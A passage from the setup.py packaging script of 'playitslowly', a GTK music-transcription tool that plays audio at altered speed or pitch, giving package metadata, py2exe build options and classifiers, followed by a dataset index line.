return reduce(do_reduce, os.walk(dir), [])
kwargs = {
'cmdclass': {'install': new_install},
'name': 'playitslowly',
'version': "1.5.1",
'description': 'A tool to help you when transcribing music. It allows you to play a piece of music at a different speed or pitch.',
'author': 'Jonas Wagner',
'author_email': 'jonas@29a.ch',
'url': 'http://29a.ch/playitslowly/',
'packages': ['playitslowly'],
'scripts': ['bin/playitslowly'],
'options': {'py2exe':{
'packages': 'encodings',
'includes': 'cairo, pango, pangocairo, atk, gobject',
'dist_dir': 'dist/win32',
'optimize': 2,
}},
'data_files': ls_r('share'),
'license': 'GNU GPL v3',
'classifiers': [
'Environment :: X11 Applications :: GTK',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Natural Language :: English',
'Operating System :: POSIX',
'Programming Language :: Python',
]
}
try:
import py2exe
kwargs['windows'] = [{'script': 'bin/playitslowly',
'icon_resources': [(1, 'playitslowly.ico')],
'dest_base': 'playitslowly'}]
except ImportError:
pass
setup(**kwargs)
| jwagner/playitslowly | setup.py | setup.py | py | 2,789 | python | en | code | 96 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.